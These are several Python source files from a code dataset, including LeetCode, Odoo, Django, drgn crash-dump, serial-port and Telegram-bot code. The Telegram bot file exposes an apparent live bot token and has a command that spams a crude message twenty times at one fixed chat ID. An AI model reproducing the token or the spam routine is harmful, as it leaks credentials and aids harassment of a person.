cursor.execute(insertSql, (temp))\n mysqlConn.commit()","repo_name":"kbbingbai/WebCrawler","sub_path":"com/hxht/service/funs.py","file_name":"funs.py","file_ext":"py","file_size_in_byte":22984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"118927167","text":"# Algo. 1\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n \"\"\"\n : Input digits: str\n : Output: List[str]\n :\n : TC: 92.41%, worst case O(4^n), normally O(3^n), \n : SC: 5.88%, worst case O(4^n+4^(n-1)+4^(n-2)+...+4^1), stack for recursive? lst_prev for each recursive step.\n :\\Algo. 1 from Ligang using recursion. For this kinda of problem where the result is dependent on the previous/last \n : step, recursion is a natural choice. Use HashTable (Dictionary) to store the digit2letter mapping info.\n : Any better algo.?\n \"\"\"\n dict_dgt2ltr = {\"2\":[\"a\", \"b\", \"c\"], \"3\":[\"d\", \"e\", \"f\"], \"4\":[\"g\", \"h\", \"i\"], \"5\":[\"j\", \"k\", \"l\"] \n , \"6\":[\"m\", \"n\", \"o\"], \"7\":[\"p\", \"q\", \"r\", \"s\"], \"8\":[\"t\", \"u\", \"v\"], \"9\":[\"w\", \"x\", \"y\", \"z\"]}\n n = len(digits)\n if n == 0: return []\n if n == 1: return dict_dgt2ltr[digits[0]]\n \n \n def recursive_func(digits: str) -> List[str]: \n n = len(digits)\n if n == 0: return []\n if n == 1: return dict_dgt2ltr[digits[0]]\n \n lst_prev = recursive_func(digits[0:n-1])\n lst_curr = []\n for i in range(len(lst_prev)):\n for j in range(len(dict_dgt2ltr[digits[n-1]])):\n lst_curr.append(lst_prev[i] + dict_dgt2ltr[digits[n-1]][j])\n \n return lst_curr\n \n \n return recursive_func(digits)\n\n\n\n\n","repo_name":"loganchen39/Leetcode_2019","sub_path":"src/Medium/0017.M.LetterCombinationsOfAPhoneNumber.py","file_name":"0017.M.LetterCombinationsOfAPhoneNumber.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72150411784","text":"from odoo import api, fields, models, _\n\n\nclass PosPaymentMethod(models.Model):\n _inherit = \"pos.payment.method\"\n\n needs_authorization_code = fields.Boolean(\n string='# Transacción requerida')\n use_payment_terms = fields.Boolean(string='Usar plazo de pago')\n payment_term_ids = fields.Many2many(\n 'account.payment.term', string='Plazo de pago')\n","repo_name":"marcobustamanteab/odoo-pos","sub_path":"src/custom-addons/dv_pos_payment_terms_auth/models/pos_payment_method.py","file_name":"pos_payment_method.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19852877369","text":"from __future__ import division\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# This file is part of DELTADOGS package.\n# DELTADOGS is free software for global optimization of computationally expensive function evaluaitons\n# you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# DELTADOGS is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with DELTADOGS. 
If not, see .\n\n# Author: Shahrouz Alimohammadi\n# Modified: Dec. 2016\n\n\n# KSE simulation using IMEXRKi4CBA(3s)\ndata1FilePath = \"data1.txt\"\n\ndef transient_detector(x=[]):\n# transient_time_detector(x) is an automatic procedure to determine the nonstationary part a signal from the stationary part.\n# It finds the transient time of the simulation using the minimum variance intreval.\n# INPUT:\n# x: is the signal which after some transient part the signal becomes stationary\n# OUTPUT:\n# ind: is the index of signal that after that the signal could be considered as a stationry signal.\n\n# If you use this code please cite:\n# Beyhaghi, P., Alimohammadi, S., and Bewley, T., A multiscale, asymptotically unbiased approach to uncertainty quantification \n# in the numerical approximation of infinite time-averaged statistics. Submitted to Journal of Uncertainity Quantification. \n\n N = len(x)\n k = np.int_([N/2])\n y = np.zeros((k, 1))\n for kk in np.arange(k):\n y[kk] = np.var(x[kk+1:])*1.0/(N-kk-1.0)\n y = np.array(-y)\n ind = y.argmax(0)\n print('index of transient point in the signal:')\n print(ind)\n return ind\n\n\n\n\ndef readInputFile(filePath):\n# reads a time series data from a file\n\n# retVal = []\n# with open(filePath, 'rb') as csvfile:\n# filereader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n# for row in filereader:\n# retVal.append([int(row[0]), int(row[1]), int(row[2])])\n retVal=[]\n with open(filePath) as file:\n line=file.readline()\n arr=[float(a) for a in line.split(',')]\n # retVal.append(file.readline())\n retVal.append(arr)\n return retVal[0]\n\n# TEST\nx = readInputFile(data1FilePath)\nx = x[:10000]\nindex = transient_detector(x)\n\n\n\n## sampled time intervals 1\nt = np.arange(0., len(x))\n# red dashes transient detector, green curve simulation results of KSE\nplt.plot(t, x, '-g')\nplt.plot([index,index], [np.min(x)/2.0, np.max(x)], '--r')\nplt.show()\n\n","repo_name":"salimoha/DOGS","sub_path":"UQ/transient_detection.py","file_name":"transient_detection.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"10282723463","text":"\"\"\" Test cases for the module responsible for transforming the data from \nthe database to a parquet file\"\"\"\n\nfrom biosearch_core.indexing.exporter import IndexManager\nfrom biosearch_core.db.model import ConnectionParams\n\ndef test_indexer_identifies_all_nodes_in_modalities():\n \"\"\" Leaf modalities must be joined with parents\n For example, mic.ele should output mic.ele and mic to enable filtering at\n multiple levels\n \"\"\"\n\n fake_conn = ConnectionParams(None, 1, None, None, None, \"schema\")\n index_mgr = IndexManager(None, fake_conn)\n modalities = [\"mic.flu\", \"mic.ele.sca\", \"gra.his\", \"oth\"]\n # pylint: disable=W0212:protected-access\n output = index_mgr._add_modality_parents(modalities)\n assert \"mic\" in output\n assert \"mic.flu\" in output\n assert \"mic.ele.sca\" in output\n assert \"gra\" in output\n assert \"gra.his\" in output\n assert \"oth\" in output\n\ndef test_indexer_returns_non_for_missing_modalities():\n \"\"\" Base case when there are no modalities \"\"\"\n fake_conn = ConnectionParams(None, 1, None, None, None, \"schema\")\n index_mgr = IndexManager(None, fake_conn)\n # pylint: disable=W0212:protected-access\n output = index_mgr._add_modality_parents([])\n assert output is None\n output = index_mgr._add_modality_parents(None)\n assert output is 
None\n","repo_name":"uic-evl/bio-search","sub_path":"content-onboarding/tests/test_indexing.py","file_name":"test_indexing.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27175858990","text":"import calendar\nimport json\nfrom calendar import monthrange\nimport datetime\nfrom datetime import timedelta\nimport itertools\nfrom django.shortcuts import render\nfrom rest_framework import viewsets\nfrom django.db.models import Q\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom .models import (\n Rent,\n)\nfrom .serializers import (\n RentListSearializer,\n RentDetailSearializer,\n RentFilterSerializer,\n RentByLocationSerializer,\n)\nfrom .filters import (\n RentFilter,\n)\n\n# Create your views here.\n\nclass RentViewSet(viewsets.ReadOnlyModelViewSet):\n #filter by age between 25 - 70 driver requirements minimum driver age\n\n filter_backends = (DjangoFilterBackend,)\n filter_class = RentFilter\n\n def get_serializer_class(self):\n if self.action == 'list':\n return RentListSearializer\n return RentDetailSearializer\n\n \n\n def get_queryset(self):\n queryset = Rent.objects \\\n .select_related(\n 'car',\n ) \\\n .prefetch_related(\n 'drop_off',\n ) \\\n .all()\n return queryset\n\n def filter_queryset(self, queryset):\n serializer = RentFilterSerializer(data=self.request.query_params)\n serializer.is_valid(raise_exception=True)\n\n start_date = serializer.validated_data.get('start_date')\n end_date = serializer.validated_data.get('end_date')\n\n if start_date and end_date:\n\n queryset = queryset.exclude(\n Q(start_date__lte=end_date),\n Q(end_date__gte=start_date),\n )\n return super().filter_queryset(queryset)\n \n def count_free(self, months, rent):\n\n current_day_year = datetime.date.today()\n last_day_year = datetime.date.today().replace(month=12, day=31)\n\n current_year = datetime.date.today().year\n start_date = rent.start_date\n end_date = rent.end_date\n\n\n if start_date == None and end_date == None:\n for i in range(1, 13):\n for j in range(1, monthrange(current_year, list(months)[i-1])[1]+1):\n months[i][j] += 1\n else:\n start = None\n end = None\n for j in range(current_day_year.month, start_date.month + 1):\n if j == start_date.month:\n start = current_day_year.day\n end = start_date.day\n\n for i in range(start, end):\n months[j][i] += 1\n else:\n start = current_day_year.day\n if current_day_year.month == j:\n end = start_date.day\n else:\n end = monthrange(current_year, j)[1]\n\n for i in range(start, monthrange(current_year, j)[1] + 1):\n months[j][i] += 1\n for k in range(1, end + 1):\n months[j + 1][k] += 1\n # теперь от даты конца и до конца года\n for j in range(start_date.month, 13):\n if j == start_date.month:\n start = end_date.day\n end = monthrange(current_year, j)[1] + 1\n for i in range(start, end):\n months[j][i] += 1\n else:\n start = 1\n end = monthrange(current_year, j)[1] + 1\n for i in range(start, end):\n months[j][i] += 1\n\n\n\n @action(detail=False, methods=['GET'])\n def information(self, request):\n queryset = self.get_queryset()\n\n serializer = RentByLocationSerializer(data=request.GET)\n serializer.is_valid(raise_exception=True)\n \n pick_up = serializer.validated_data.get('pick_up')\n drop_off = serializer.validated_data.get('drop_off')\n \n queryset = queryset \\\n .filter(pick_up=pick_up,\n 
drop_off=drop_off)\n\n year = datetime.date.today().year\n \n months = dict.fromkeys(range(1, 13))\n for i in range(1, 13):\n days = list(itertools.chain.from_iterable(calendar.monthcalendar(year, i)))\n clean_days = dict.fromkeys([day for day in days if day != 0], 0)\n months[i] = clean_days\n \n\n for i in range(len(queryset)):\n self.count_free(months, queryset[i])\n\n data = json.dumps(months)\n \n return Response(data, status=status.HTTP_200_OK)\n\n","repo_name":"zhunus1/turla_backend","sub_path":"rents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36843950415","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 9 20:30:43 2019\n\n@author: kai-s\n\nthis module contains configuration functions for the UltrasonicSoundBarrier\n\"\"\"\n\nimport datetime\nimport serial\n# open connection\nconnection = serial.Serial('COM10',baudrate = 9600,timeout = 1)\n\n# Software Interface Layer\n #This function allows an complete or time only configuration\ndef init_module(full_config):\n # Get current time\n now = current_time()\n send_serial(now)\n # configurate alarms\n if full_config:\n na_module()\n \n #close serial port\n else:\n connection.close()\n\n# Create two new alarms \ndef na_module(): \n alarms = [\"Alarm1\",\"Alarm2\",\"z\\r\\n\"]\n # configurate alarms\n alarms[0] = new_alarm()\n alarms[1]= new_alarm()\n joint_alarms = \",\".join(alarms)\n send_serial(joint_alarms)\n #close serial port\n connection.close()\n\n \n \n# Barebone Init Functions\n # Get the current time -> return to Send Serial Layer\ndef current_time():\n #connected_device = serial.Serial('COM10', baudrate = 9600, timeout = 1)\n \n date_time= [12,40,00,0,11,2018,00]\n timestamp = datetime.datetime.now()\n date_time[0]= timestamp.hour\n date_time[1]= timestamp.minute\n date_time[2]= timestamp.second\n date_time[3]= timestamp.year\n date_time[4]= timestamp.month\n date_time[5]= timestamp.day\n # Terminate String\n date_time[6] =\"z\\r\\n\"\n \n for x in range(0, 7):\n date_time[x] = str(date_time[x])\n #print(date_time[x])\n \n timestamp = \",\".join(date_time)\n \n return timestamp \n\n # Function for creating new alarm -> return to Send Serial\ndef new_alarm() :\n inputs = [\"Hours\",\"Minutes\",\"Seconds\"]\n # send 'g' to enter config menue\n connection.write(b'g')\n \n # wait for ACK string to be received\n \n \n \n # Get input from user\n for i in range(3):\n print(\"Please Enter \" + inputs[i])\n inputs[i] = str(input())\n \n # Merge strings together\n alarm = \",\".join(inputs)\n print(alarm)\n #return string from function\n return alarm; \n\n# Hardware Interface Layer\n # only this function actually interfaces to the Hardware\ndef send_serial(nts):\n#encode to bytes\n string_b = nts.encode()\n# send to Serial Port \n connection.write(string_b)","repo_name":"KaiStaud/UltrasonicSoundBarrier","sub_path":"3_Interface_Programms/config_functions.py","file_name":"config_functions.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12724627537","text":"def dfs(tickets):\n n = len(tickets)\n twithIdx = [[x[0], x[1], i] for i,x in enumerate(tickets)]\n start = sorted([x for x in twithIdx if x[0] == \"ICN\"], key=lambda x: x[1])[0]\n stack = [start[0], start[1]]\n visited = [False] * n\n visited[start[2]] = True\n ans = []\n while len(ans) + len(stack) != len(tickets) + 1:\n top = 
stack[-1]\n nextlist = sorted([x for x in twithIdx if x[0] == top and not visited[x[2]]], key=lambda x:x[1])\n if len(nextlist) == 0:\n tmp = stack.pop()\n ans.append(tmp)\n continue\n nextnode = nextlist[0]\n stack.append(nextnode[1])\n visited[nextnode[2]] = True\n while stack:\n ans.append(stack.pop())\n return list(reversed(ans))\n \ndef solution(tickets):\n return dfs(tickets)\n\n \nprint(dfs([[\"ICN\", \"JFK\"], [\"HND\", \"IAD\"], [\"JFK\", \"HND\"]]))","repo_name":"leesunmin1231/Coding_test","sub_path":"프로그래머스/랜덤/여행경로.py","file_name":"여행경로.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74263278984","text":"import telebot\nimport json\ntoken = \"5259442386:AAGZjTZP-O_2ajDvx9gY35nFDV_6wX-OEPo\"\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=[\"start\"])\ndef bot_message_handler(message):\n bot.send_message(message.chat.id, str(message.chat.id) + \" тесттовое сообщение при START!!!!\")\n\n\n@bot.message_handler(commands=[\"zaebat_peska\"])\ndef bot_message_handler(message):\n for i in range(20):\n bot.send_message(361570583, \" ЗАЕБЕМ ПЕСКА \"*10)\n\n\n@bot.message_handler(commands=[\"count\"])\ndef bot_message_handler(message):\n dict1 = json.load(open(\"dict_counter.txt\", \"r\"))\n\n #dict1 = json.load(open(\"dict_counter.txt\", \"r\"))\n res = []\n result = \"\"\n D = dict1.copy()\n lst_v = list(D[str(message.chat.id)].values())\n\n for i in range(7):\n res.append(lst_v.index(max(lst_v)))\n result += f\"{i+1}. {list(D[str(message.chat.id)].items())[lst_v.index(max(lst_v))]}\\n\"\n lst_v[lst_v.index(max(lst_v))] = 0\n result += f'\\n всего уникальных слов было использовано - {len(dict1[str(message.chat.id)])}'\n\n bot.send_message(message.chat.id, f\"самые часто используемые слова в вашей беседе это:\\n {result}\")\n\n\n@bot.message_handler(func=lambda message: message)\ndef bot_message_handler(message):\n lst = message.text.split(' ')\n dict1 = json.load(open(\"dict_counter.txt\", \"r\"))\n\n for i in lst:\n if i.strip('.,?!-_') not in ['а','и','но','в','это', 'если','без','с','как','за','до','я','ты','мы', 'все','всё','лол', 'на', 'не', 'к', '','Путин','путин','к','что','чтобы','у','нас']:\n try:\n if i.strip('.,?!-_') not in dict1[str(message.chat.id)]:\n dict1[str(message.chat.id)][i.strip('.,?!-_')] = 1\n json.dump(dict1, open(\"dict_counter.txt\", \"w\"), indent=4, ensure_ascii=False)\n else:\n dict1[str(message.chat.id)][i.strip('.,?!-_')] += 1\n json.dump(dict1, open(\"dict_counter.txt\", \"w\"), indent=4, ensure_ascii=False)\n except KeyError:\n dict1[str(message.chat.id)] = {}\n dict1[str(message.chat.id)][i.strip('.,?!-_')] = 1\n json.dump(dict1, open(\"dict_counter.txt\", \"w\"), indent=4, ensure_ascii=False)\n\n\n@bot.message_handler(func=lambda message: message.text in [\"ТЕСТ\"])\ndef bot_message_handler(message):\n print('принял сообщение в группе')\n bot.send_message(message.from_user.id, \" тесттовое сообщение при ТЕСТЕ\")\n bot.send_message(message.chat.id, \" тесттовое сообщение при ТЕСТЕ!!!!\")\n\nbot.infinity_polling()\n","repo_name":"Goodila/bot_counter_v1.1","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34041586256","text":"#!/usr/bin/env python3\nimport math\nimport re\n\nfrom drgn import Object\nfrom drgn import Program\nfrom drgn.helpers.linux.list import list_for_each_entry\nfrom 
drgn.helpers.linux.printk import get_printk_records\nfrom drgn.helpers.linux.mm import page_to_virt\n\n\ndef get_crashstash(prog: Program) -> bytes:\n log = get_printk_records(prog)\n log.sort(key=lambda l: l.timestamp)\n expr = re.compile(\n rb\"crashstash: STASH: (?P[a-fA-F0-9]+) \"\n rb\"SIZE: (?P[a-fA-F0-9]+) \"\n rb\"PAGES: (?P[a-fA-F0-9]+)\"\n )\n for rec in reversed(log):\n match = expr.fullmatch(rec.text)\n if match:\n break\n else:\n raise Exception(\"Could not find a crashstash log record\")\n\n head = Object(prog, \"struct list_head *\", value=int(match.group(\"STASH\"), 16))\n size = Object(prog, \"u64\", address=int(match.group(\"SIZE\"), 16)).value_()\n page_count = Object(prog, \"u64\", address=int(match.group(\"PAGES\"), 16)).value_()\n\n pages = list(list_for_each_entry(\"struct page\", head, \"lru\"))\n PAGE_SIZE = prog[\"PAGE_SIZE\"].value_()\n\n if len(pages) != page_count or page_count != math.ceil(size / PAGE_SIZE):\n raise Exception(\"Inconsistent metadata for crashstash size\")\n\n data = b\"\"\n for page in pages:\n chunksz = min(PAGE_SIZE, size)\n chunkdat = prog.read(page_to_virt(page), chunksz)\n data += chunkdat\n size -= chunksz\n return data\n","repo_name":"brenns10/kernel_stuff","sub_path":"crashstash/crashstash.py","file_name":"crashstash.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16249232237","text":"'''Contains functions to help with default settings\nCreated on Feb 14, 2011\n\n@author: jnaous\n'''\nimport sys\nsys.path.append(\"/opt/ofelia/expedient/src/python/expedient/clearinghouse/\")\n\ndef append_to_local_setting(setting_name, l, globals_dict, at_start=False):\n \"\"\"Set or update a setting by adding items to it.\n \n If a setting with name C{EXTRA_%s} % C{setting_name} exists in C{localsettings}\n then this function will add append list C{l} to the value of\n EXTRA_C{setting_name}. The setting in C{localsettings} must be a list.\n This function will actually set the value in the module, so no need to\n reset it.\n \n @param setting_name: The name of the setting, to which an \"EXTRA_\" will\n be prepended.\n @type setting_name: C{str}\n @param l: list to append to the setting's value\n @type l: list\n @param globals_dict: the globals for the module calling the function\n @type globals_dict: C{dict}\n @keyword at_start: Should the list be inserted at the start?\n Default is False\n @type at_start: C{bool}\n \n @return: the value of the new setting.\n \"\"\"\n \n import localsettings\n setting = getattr(localsettings, \"EXTRA_%s\" % setting_name, [])\n v = l + setting if at_start else setting + l\n _modname = globals_dict['__name__']\n _caller_mod = sys.modules[_modname]\n setattr(_caller_mod, setting_name, v)\n return v\n\ndef get_or_set_default(setting_name, default, globals_dict):\n \"\"\"Get or set a default setting from localsettings.\n \n If the setting with name C{setting_name} is in localsettings, then\n use that as the default value. Otherwise, use C{default}. 
This function\n will actually set the value in the module, so no need to reset it.\n \n @param setting_name: The setting name to be set\n @type setting_name: C{str}\n @param default: The dafult value of the setting if not found.\n @type default: unspecified.\n @param globals_dict: the globals for the module calling the function\n @type globals_dict: C{dict}\n \n @return: The value that was set.\n \"\"\"\n import localsettings\n if hasattr(localsettings, setting_name):\n v = getattr(localsettings, setting_name)\n else:\n v = default\n\n _modname = globals_dict['__name__']\n _caller_mod = sys.modules[_modname]\n \n setattr(_caller_mod, setting_name, v)\n return v\n","repo_name":"fp7-ofelia/ocf","sub_path":"expedient/src/python/expedient/clearinghouse/defaultsettings/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"81"} +{"seq_id":"73792496906","text":"#!/us/bin/python3\n\nimport os\nimport re\nimport subprocess\n\nPinsTypeName = ['Stright', 'Right_Angle', 'SMD']\n\n\n\ndef set_env():\n openscad_path = 'C:\\\\Program Files\\\\OpenSCAD'\n meshlabserver_path = 'C:\\\\Program Files\\\\VCG\\\\MeshLab'\n os.environ['PATH'] = meshlabserver_path + os.pathsep + openscad_path + os.pathsep + os.environ['PATH']\n\n\ndef change_material(filepath, material):\n model = ''\n with open(filepath, 'r+') as wrl_file:\n model = wrl_file.read()\n model = re.sub(r'(material Material[\\s]*{)[^}]*', material, model)\n wrl_file.seek(0)\n wrl_file.truncate(0)\n wrl_file.write(model)\n\n\ndef get_geometry(filename):\n with open(filename, 'r') as wrl_file:\n model = wrl_file.read()\n geometry = re.search(r'(geometry[^;]*?)appearance', model).group(1) + ' }'\n geometry = re.sub(r'\\s(.*){', r' {', geometry)\n geometry = re.sub(r'\\s(.*)\\[', r' [', geometry)\n geometry = re.sub(r'[^ ] {12}([^ ])', '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {10}([^ ])', '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {8}([^ ])' , '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {6}([^ ])' , '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {7}([^ ])' , '\\n \\\\1', geometry)\n return geometry\n\n\ndef build_model(housing, pins):\n header = \"#VRML V2.0 utf8\\n\\nchildren [\"\n footer = \"\\n]\\n\"\n pins_material = '''\n Shape {\n appearance Appearance {\n material Material {\n diffuseColor 0.72 0.72 0.72\n emissiveColor 0.0 0.0 0.0\n specularColor 1.0 1.0 1.0\n ambientIntensity 1.0\n transparency 0.0\n shininess 1.0\n }\n }\n '''\n housing_material = '''\n Shape {\n appearance Appearance {\n material Material { \n diffuseColor 1.0 1.0 1.0\n emissiveColor 0.0 0.0 0.0\n specularColor 1.0 1.0 1.0\n ambientIntensity 1.0\n transparency 0.0\n shininess 1.0\n }\n }\n '''\n return header + housing_material + housing + pins_material + pins + footer\n\n\ndef build_stl():\n\n print('Make STL')\n\n if not os.path.exists('stl'):\n os.makedirs('stl')\n\n for PinsNumber in range(2,21):\n\n # Housing\n print('Build WF-{0:02}_Housing.stl'.format(PinsNumber))\n command = 'openscad -D Pins_Number={0} -D Pins_Type=1 -D Pins_Enable=0 -D Housing_Enable=1 -o stl/WF-{0:02}_Housing.stl WFxx.scad'.format(PinsNumber)\n subprocess.call(command)\n\n print('Build WF-{0:02}_Housing_Right_Angle.stl'.format(PinsNumber))\n command = 'openscad -D Pins_Number={0} -D Pins_Type=2 -D Pins_Enable=0 -D Housing_Enable=1 -o stl/WF-{0:02}_Housing_Right_Angle.stl WFxx.scad'.format(PinsNumber)\n subprocess.call(command)\n\n # Pins\n for PinsType in 
range(1,4):\n print('Build WF-{0:02}_Pins_{1}.stl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n command = 'openscad -D Pins_Number={0} -D Pins_Type={1} -D Pins_Enable=1 -D Housing_Enable=0 -o stl/WF-{0:02}_Pins_{2}.stl WFxx.scad'.format(PinsNumber, PinsType, PinsTypeName[PinsType-1])\n subprocess.call(command)\n\n\ndef build_wrl():\n\n print('Convert to VRML')\n\n if not os.path.exists('wrl'):\n os.makedirs('wrl')\n\n for PinsNumber in range(2,21):\n\n # Convert housing to VRML\n print('Build WF-{0:02}_Housing.wrl'.format(PinsNumber))\n command = 'meshlabserver -i stl/WF-{0:02}_Housing.stl -o wrl/WF-{0:02}_Housing.wrl'.format(PinsNumber)\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n print('Build WF-{0:02}_Housing_Right_Angle.wrl'.format(PinsNumber))\n command = 'meshlabserver -i stl/WF-{0:02}_Housing_Right_Angle.stl -o wrl/WF-{0:02}_Housing_Right_Angle.wrl'.format(PinsNumber)\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n # Convert pins to VRML\n for PinsType in range(1,4):\n print('Build WF-{0:02}_Pins_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n command = 'meshlabserver -i stl//WF-{0:02}_Pins_{1}.stl -o wrl/WF-{0:02}_Pins_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1])\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n\ndef build():\n build_stl()\n build_wrl()\n\n if not os.path.exists('out'):\n os.makedirs('out')\n\n print('-----')\n\n for PinsNumber in range(2,21):\n for PinsType in range(1,4):\n\n print('Build WF-{0:02}_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n\n housing = ''\n if PinsType == 2:\n housing = get_geometry('wrl/WF-{0:02}_Housing_Right_Angle.wrl'.format(PinsNumber))\n else:\n housing = get_geometry('wrl/WF-{0:02}_Housing.wrl'.format(PinsNumber))\n\n pins = get_geometry('wrl/WF-{0:02}_Pins_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n\n with open('out/WF-{0:02}_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]), 'w') as wrl_file:\n wrl_file.write(build_model(housing, pins))\n\n \nif __name__ == '__main__':\n set_env()\n build()","repo_name":"kolod/DipTrace-WFxx","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13548940378","text":"from django.forms import ModelForm, widgets\nfrom .models import Patient\n\nclass PatientForm(ModelForm):\n class Meta:\n model = Patient\n fields = '__all__'\n exclude = ['date_added']\n labels = {\n 'case_paper_number': 'Case Paper Number',\n 'full_name': 'Full Name',\n 'birth_date': 'Date of Birth',\n 'mobile_number': 'Mobile Number',\n 'pin_code': 'Pin Code',\n 'referred_by': 'Referred By',\n 'city': 'City/Town/Village'\n }\n widgets = {\n 'case_paper_number': widgets.TextInput(attrs={'autocomplete': 'off'}),\n 'full_name': widgets.TextInput(attrs={'autocomplete': 'off'}),\n 'birth_date': widgets.DateInput(format= '%d-%m-%Y', attrs={'class':'form-control', 'autocomplete':'off', 'placeholder': 'dd-mm-yyyy'}),\n 'mobile_number': widgets.NumberInput(attrs={'type': 'number'}),\n 'email': widgets.EmailInput(),\n 'pin_code': widgets.NumberInput(attrs={'required': 'required'}),\n }\n","repo_name":"pcgujar2019/docmessenger","sub_path":"patients/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5907842051","text":"from 
sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom lightgbm import LGBMClassifier\nfrom pathlib import Path\nimport pandas as pd\nimport warnings\nimport requests\n# import datetime ########## from datetime import datetime으로 변경\nfrom datetime import datetime\n# import optuna ########## 사용하지 않으므로 삭제\nimport json\nimport copy\nimport os\nimport parking_input_data\nprint('!!!!!!!!!!!!!!! Start park_analysis.py !!!!!!!!!!!!!!!')\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\npath = Path.cwd().parent\nraw_data = str(path) + '/raw_data/'\ndata = str(path) + '/data/'\nresult = str(path) + '/result_data/'\n\nwarnings.filterwarnings(action='ignore')\n\n# 데이터 로드\nprint(datetime.now().strftime('%Y.%m.%d %Hh%Mm%Ss'), 'Load Data')\ndf = parking_input_data.dataset\ndf = df.astype(float)\ndf[['연','월','일','시']] = df[['연','월','일','시']].astype(int)\n\npredict_df = parking_input_data.predict_dataset\npredict_df=predict_df.astype(float)\npredict_df[['연','월','일','시']] = predict_df[['연','월','일','시']].astype(int)\n\n# train, test 나누기\ntrain_data, test_data = train_test_split(df, test_size=0.33, random_state=42)\n\nX_train, y_train = train_data.drop('혼잡도', axis=1), train_data['혼잡도']\nX_test, y_test = test_data.drop('혼잡도', axis=1), test_data['혼잡도']\n\n# 모델 적합\nprint(datetime.now().strftime('%Y.%m.%d %Hh%Mm%Ss'), 'Fit Model')\nmodel = LGBMClassifier(random_state=42) ######## 실행할 때마다 결과가 바뀌면 안 됨 --> random_state 지정\nmodel.fit(X_train, y_train, categorical_feature=['주차장'], eval_set=(X_test,y_test), verbose=1)\n\n# 적합된 모델로 혼잡도 예측\nprint(datetime.now().strftime('%Y.%m.%d %Hh%Mm%Ss'), 'Predict')\npredict_df = predict_df[X_train.columns]\n\n\npredict = pd.DataFrame(model.predict(predict_df))\noutput = pd.concat([predict_df, predict], axis= 1)\noutput = output.rename(columns={0:'혼잡도예측'})\noutput = output[['연','월','일','시','분','요일','주차장','혼잡도예측']]\n\n# 예측일시, 시간대 추가\noutput['예측일시'] = output['연'].astype(str) + output['월'].astype(str) + output['일'].astype(str)\noutput['시간대'] = output['시'].astype(str) + output['분'].astype(str)\n\n# 결과 테이블 만들기\nresult_table = pd.DataFrame(columns=['등록일시', '주차장명', '예측일시', '시간대', '혼잡도'])\nresult_table['주차장명'] = output['주차장']\nresult_table['예측일시'] = output['예측일시']\nresult_table['시간대'] = output['시간대']\nresult_table['혼잡도'] = output['혼잡도예측']\nresult_table['등록일시'] = datetime.now().strftime('%Y%m%d%H%M%S')\nresult_table = result_table.astype(str)\n#result_table.to_csv(result + f'park_analysis.csv', index=False, encoding='utf-8-sig')\n\n","repo_name":"KeumHyeonJun/Governmnet_project","sub_path":"주차예측/parking_park_analysis.py","file_name":"parking_park_analysis.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 